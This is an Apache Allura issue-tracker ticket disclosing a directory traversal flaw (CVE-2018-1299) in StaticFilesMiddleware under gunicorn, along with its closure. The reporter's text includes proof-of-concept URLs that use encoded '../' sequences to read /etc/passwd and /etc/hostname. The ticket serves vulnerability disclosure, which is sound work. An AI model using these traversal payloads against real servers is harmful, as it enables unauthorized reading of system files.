Apache Allura™ / Tickets / #8180 StaticFilesMiddleware allows directory traversal

#8180 StaticFilesMiddleware allows directory traversal

Milestone: v1.8.0

Status: closed

Owner: Dave Brondsema

Labels: security (36)

Component: General

Reviewer: nobody

Updated: 2018-02-06

Created: 2018-01-29

Creator: Dave Brondsema

Private: No

From reporter:

The vulnerability allows unauthenticated attackers to retrieve
arbitrary files from the Allura web server.

PoC URsL:
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname</allura-web-server></allura-web-server>

The %2F does't seem necessary in my testing. The paster, nginx and apache/mod_wsgi servers seem to protect against this, but gunicorn (which we recommend for production) permits the vulnerability.

This has been assigned CVE-2018-1299

Discussion

Dave Brondsema - 2018-02-01

status: in-progress --> closed
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Dave Brondsema - 2018-02-05

Milestone: unreleased --> v1.8.0
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Dave Brondsema - 2018-02-06

ERROR! The markdown supplied could not be parsed correctly. Did you forget to surround a code snippet with "~~~~"?
- **private**: Yes --> No
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Apache Allura™

Forge software for hosting software projects

Milestone

Searches

Help

#8180 StaticFilesMiddleware allows directory traversal

Discussion